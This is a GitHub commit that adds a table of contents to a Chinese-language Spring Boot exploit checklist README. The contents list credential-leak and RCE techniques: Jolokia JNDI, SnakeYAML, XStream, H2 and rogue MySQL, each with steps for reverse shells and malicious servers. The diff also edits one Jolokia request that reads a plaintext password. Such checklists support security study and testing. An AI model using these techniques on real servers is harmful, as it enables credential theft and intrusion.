Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Sign up
Appearance settings

Commit 08bb401

Browse files
committed
add Table of Contents
1 parent 26009ea commit 08bb401

File tree

1 file changed

+100
-1
lines changed

1 file changed

+100
-1
lines changed

‎README.md

Lines changed: 100 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -4,6 +4,105 @@ Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安
44

55

66

7+
目录
8+
-----------------
9+
10+
* [Spring Boot Vulnerability Exploit CheckList](#spring-boot-vulnerability-exploit-checklist)
11+
* [零:路由和版本](#%E9%9B%B6%E8%B7%AF%E7%94%B1%E5%92%8C%E7%89%88%E6%9C%AC)
12+
* [0x01:路由知识](#0x01%E8%B7%AF%E7%94%B1%E7%9F%A5%E8%AF%86)
13+
* [0x02:版本知识](#0x02%E7%89%88%E6%9C%AC%E7%9F%A5%E8%AF%86)
14+
* [常见组件的版本相互依赖关系:](#%E5%B8%B8%E8%A7%81%E7%BB%84%E4%BB%B6%E7%9A%84%E7%89%88%E6%9C%AC%E7%9B%B8%E4%BA%92%E4%BE%9D%E8%B5%96%E5%85%B3%E7%B3%BB)
15+
* [Spring Cloud 与 Spring Boot 大版本之间的依赖关系:](#spring-cloud-%E4%B8%8E-spring-boot-%E5%A4%A7%E7%89%88%E6%9C%AC%E4%B9%8B%E9%97%B4%E7%9A%84%E4%BE%9D%E8%B5%96%E5%85%B3%E7%B3%BB)
16+
* [Spring Cloud 小版本号的后缀及含义:](#spring-cloud-%E5%B0%8F%E7%89%88%E6%9C%AC%E5%8F%B7%E7%9A%84%E5%90%8E%E7%BC%80%E5%8F%8A%E5%90%AB%E4%B9%89)
17+
* [一:信息泄露](#%E4%B8%80%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2)
18+
* [0x01:路由地址及接口调用详情泄漏](#0x01%E8%B7%AF%E7%94%B1%E5%9C%B0%E5%9D%80%E5%8F%8A%E6%8E%A5%E5%8F%A3%E8%B0%83%E7%94%A8%E8%AF%A6%E6%83%85%E6%B3%84%E6%BC%8F)
19+
* [0x02:配置不当而暴露的路由](#0x02%E9%85%8D%E7%BD%AE%E4%B8%8D%E5%BD%93%E8%80%8C%E6%9A%B4%E9%9C%B2%E7%9A%84%E8%B7%AF%E7%94%B1)
20+
* [0x03:获取被星号脱敏的密码的明文 (方法一)](#0x03%E8%8E%B7%E5%8F%96%E8%A2%AB%E6%98%9F%E5%8F%B7%E8%84%B1%E6%95%8F%E7%9A%84%E5%AF%86%E7%A0%81%E7%9A%84%E6%98%8E%E6%96%87-%E6%96%B9%E6%B3%95%E4%B8%80)
21+
* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6)
22+
* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95)
23+
* [步骤一: 找到想要获取的属性名](#%E6%AD%A5%E9%AA%A4%E4%B8%80-%E6%89%BE%E5%88%B0%E6%83%B3%E8%A6%81%E8%8E%B7%E5%8F%96%E7%9A%84%E5%B1%9E%E6%80%A7%E5%90%8D)
24+
* [步骤二: jolokia 调用 org\.springframework\.cloud\.context\.environment Mbean 获取明文](#%E6%AD%A5%E9%AA%A4%E4%BA%8C-jolokia-%E8%B0%83%E7%94%A8-orgspringframeworkcloudcontextenvironment-mbean-%E8%8E%B7%E5%8F%96%E6%98%8E%E6%96%87)
25+
* [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86)
26+
* [0x04:获取被星号脱敏的密码的明文 (方法二)](#0x04%E8%8E%B7%E5%8F%96%E8%A2%AB%E6%98%9F%E5%8F%B7%E8%84%B1%E6%95%8F%E7%9A%84%E5%AF%86%E7%A0%81%E7%9A%84%E6%98%8E%E6%96%87-%E6%96%B9%E6%B3%95%E4%BA%8C)
27+
* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-1)
28+
* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-1)
29+
* [步骤一: 找到想要获取的属性名](#%E6%AD%A5%E9%AA%A4%E4%B8%80-%E6%89%BE%E5%88%B0%E6%83%B3%E8%A6%81%E8%8E%B7%E5%8F%96%E7%9A%84%E5%B1%9E%E6%80%A7%E5%90%8D-1)
30+
* [步骤二: 使用 nc 监听 HTTP 请求](#%E6%AD%A5%E9%AA%A4%E4%BA%8C-%E4%BD%BF%E7%94%A8-nc-%E7%9B%91%E5%90%AC-http-%E8%AF%B7%E6%B1%82)
31+
* [步骤三: 设置 eureka\.client\.serviceUrl\.defaultZone 属性](#%E6%AD%A5%E9%AA%A4%E4%B8%89-%E8%AE%BE%E7%BD%AE-eurekaclientserviceurldefaultzone-%E5%B1%9E%E6%80%A7)
32+
* [步骤四: 刷新配置](#%E6%AD%A5%E9%AA%A4%E5%9B%9B-%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE)
33+
* [步骤五: 解码属性值](#%E6%AD%A5%E9%AA%A4%E4%BA%94-%E8%A7%A3%E7%A0%81%E5%B1%9E%E6%80%A7%E5%80%BC)
34+
* [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-1)
35+
* [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90)
36+
* [二:远程代码执行](#%E4%BA%8C%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C)
37+
* [0x01:whitelabel error page SpEL RCE](#0x01whitelabel-error-page-spel-rce)
38+
* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-2)
39+
* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-2)
40+
* [步骤一:找到一个正常传参处](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%89%BE%E5%88%B0%E4%B8%80%E4%B8%AA%E6%AD%A3%E5%B8%B8%E4%BC%A0%E5%8F%82%E5%A4%84)
41+
* [步骤二:执行 SpEL 表达式](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E6%89%A7%E8%A1%8C-spel-%E8%A1%A8%E8%BE%BE%E5%BC%8F)
42+
* [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-2)
43+
* [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-1)
44+
* [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83)
45+
* [0x02:spring cloud SnakeYAML RCE](#0x02spring-cloud-snakeyaml-rce)
46+
* [<strong>利用条件:</strong>](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-3)
47+
* [<strong>利用方法:</strong>](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-3)
48+
* [步骤一: 托管 yml 和 jar 文件](#%E6%AD%A5%E9%AA%A4%E4%B8%80-%E6%89%98%E7%AE%A1-yml-%E5%92%8C-jar-%E6%96%87%E4%BB%B6)
49+
* [步骤二: 设置 spring\.cloud\.bootstrap\.location 属性](#%E6%AD%A5%E9%AA%A4%E4%BA%8C-%E8%AE%BE%E7%BD%AE-springcloudbootstraplocation-%E5%B1%9E%E6%80%A7)
50+
* [步骤三: 刷新配置](#%E6%AD%A5%E9%AA%A4%E4%B8%89-%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE)
51+
* [<strong>漏洞原理:</strong>](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-3)
52+
* [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-2)
53+
* [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-1)
54+
* [0x03:eureka xstream deserialization RCE](#0x03eureka-xstream-deserialization-rce)
55+
* [<strong>利用条件:</strong>](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-4)
56+
* [<strong>利用方法:</strong>](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-4)
57+
* [步骤一:架设响应恶意 XStream payload 的网站](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%9E%B6%E8%AE%BE%E5%93%8D%E5%BA%94%E6%81%B6%E6%84%8F-xstream-payload-%E7%9A%84%E7%BD%91%E7%AB%99)
58+
* [步骤二:监听反弹 shell 的端口](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E7%9B%91%E5%90%AC%E5%8F%8D%E5%BC%B9-shell-%E7%9A%84%E7%AB%AF%E5%8F%A3)
59+
* [步骤三:设置 eureka\.client\.serviceUrl\.defaultZone 属性](#%E6%AD%A5%E9%AA%A4%E4%B8%89%E8%AE%BE%E7%BD%AE-eurekaclientserviceurldefaultzone-%E5%B1%9E%E6%80%A7)
60+
* [步骤四:刷新配置](#%E6%AD%A5%E9%AA%A4%E5%9B%9B%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE)
61+
* [<strong>漏洞原理:</strong>](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-4)
62+
* [<strong>漏洞分析:</strong>](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-3)
63+
* [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-2)
64+
* [0x04:Jolokia logback JNDI RCE](#0x04jolokia-logback-jndi-rce)
65+
* [<strong>利用条件:</strong>](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-5)
66+
* [<strong>利用方法:</strong>](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-5)
67+
* [步骤一:查看已存在的 MBeans](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%9F%A5%E7%9C%8B%E5%B7%B2%E5%AD%98%E5%9C%A8%E7%9A%84-mbeans)
68+
* [步骤二:托管 xml 文件](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E6%89%98%E7%AE%A1-xml-%E6%96%87%E4%BB%B6)
69+
* [步骤三:准备要执行的 Java 代码](#%E6%AD%A5%E9%AA%A4%E4%B8%89%E5%87%86%E5%A4%87%E8%A6%81%E6%89%A7%E8%A1%8C%E7%9A%84-java-%E4%BB%A3%E7%A0%81)
70+
* [步骤四:架设恶意 ldap 服务](#%E6%AD%A5%E9%AA%A4%E5%9B%9B%E6%9E%B6%E8%AE%BE%E6%81%B6%E6%84%8F-ldap-%E6%9C%8D%E5%8A%A1)
71+
* [步骤五:监听反弹 shell 的端口](#%E6%AD%A5%E9%AA%A4%E4%BA%94%E7%9B%91%E5%90%AC%E5%8F%8D%E5%BC%B9-shell-%E7%9A%84%E7%AB%AF%E5%8F%A3)
72+
* [步骤六:从外部 URL 地址加载日志配置文件](#%E6%AD%A5%E9%AA%A4%E5%85%AD%E4%BB%8E%E5%A4%96%E9%83%A8-url-%E5%9C%B0%E5%9D%80%E5%8A%A0%E8%BD%BD%E6%97%A5%E5%BF%97%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6)
73+
* [<strong>漏洞原理:</strong>](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-5)
74+
* [<strong>漏洞分析:</strong>](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-4)
75+
* [0x05:Jolokia Realm JNDI RCE](#0x05jolokia-realm-jndi-rce)
76+
* [<strong>利用条件:</strong>](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-6)
77+
* [<strong>利用方法:</strong>](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-6)
78+
* [步骤一:查看已存在的 MBeans](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%9F%A5%E7%9C%8B%E5%B7%B2%E5%AD%98%E5%9C%A8%E7%9A%84-mbeans-1)
79+
* [步骤二:准备要执行的 Java 代码](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E5%87%86%E5%A4%87%E8%A6%81%E6%89%A7%E8%A1%8C%E7%9A%84-java-%E4%BB%A3%E7%A0%81)
80+
* [步骤三:架设恶意 rmi 服务](#%E6%AD%A5%E9%AA%A4%E4%B8%89%E6%9E%B6%E8%AE%BE%E6%81%B6%E6%84%8F-rmi-%E6%9C%8D%E5%8A%A1)
81+
* [步骤四:监听反弹 shell 的端口](#%E6%AD%A5%E9%AA%A4%E5%9B%9B%E7%9B%91%E5%90%AC%E5%8F%8D%E5%BC%B9-shell-%E7%9A%84%E7%AB%AF%E5%8F%A3)
82+
* [步骤五:发送恶意 payload](#%E6%AD%A5%E9%AA%A4%E4%BA%94%E5%8F%91%E9%80%81%E6%81%B6%E6%84%8F-payload)
83+
* [<strong>漏洞原理:</strong>](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-6)
84+
* [<strong>漏洞分析:</strong>](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-5)
85+
* [0x06:h2 database query RCE](#0x06h2-database-query-rce)
86+
* [<strong>利用条件:</strong>](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-7)
87+
* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-7)
88+
* [步骤一:设置 spring\.datasource\.hikari\.connection\-test\-query 属性](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E8%AE%BE%E7%BD%AE-springdatasourcehikariconnection-test-query-%E5%B1%9E%E6%80%A7)
89+
* [步骤二:重启应用](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E9%87%8D%E5%90%AF%E5%BA%94%E7%94%A8)
90+
* [<strong>漏洞原理:</strong>](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-7)
91+
* [<strong>漏洞分析:</strong>](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-6)
92+
* [0x07:mysql jdbc deserialization RCE](#0x07mysql-jdbc-deserialization-rce)
93+
* [<strong>利用条件:</strong>](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-8)
94+
* [<strong>利用方法:</strong>](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-8)
95+
* [步骤一:查看环境依赖](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%9F%A5%E7%9C%8B%E7%8E%AF%E5%A2%83%E4%BE%9D%E8%B5%96)
96+
* [步骤二:架设恶意 rogue mysql server](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E6%9E%B6%E8%AE%BE%E6%81%B6%E6%84%8F-rogue-mysql-server)
97+
* [步骤三:设置 spring\.datasource\.url 属性](#%E6%AD%A5%E9%AA%A4%E4%B8%89%E8%AE%BE%E7%BD%AE-springdatasourceurl-%E5%B1%9E%E6%80%A7)
98+
* [步骤四:刷新配置](#%E6%AD%A5%E9%AA%A4%E5%9B%9B%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE-1)
99+
* [步骤五:触发数据库查询](#%E6%AD%A5%E9%AA%A4%E4%BA%94%E8%A7%A6%E5%8F%91%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9F%A5%E8%AF%A2)
100+
* [步骤六:恢复正常 jdbc url](#%E6%AD%A5%E9%AA%A4%E5%85%AD%E6%81%A2%E5%A4%8D%E6%AD%A3%E5%B8%B8-jdbc-url)
101+
* [<strong>漏洞原理:</strong>](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-8)
102+
* [<strong>漏洞分析:</strong>](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-7)
103+
104+
105+
7106
## 零:路由和版本
8107

9108
### 0x01:路由知识
@@ -214,7 +313,7 @@ spring 1.x
214313

215314
```
216315
POST /jolokia
217-
Content-Type: application/x-www-form-urlencoded
316+
Content-Type: application/json
218317
219318
{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}
220319
```

0 commit comments

Comments
(0)

AltStyle によって変換されたページ (->オリジナル) /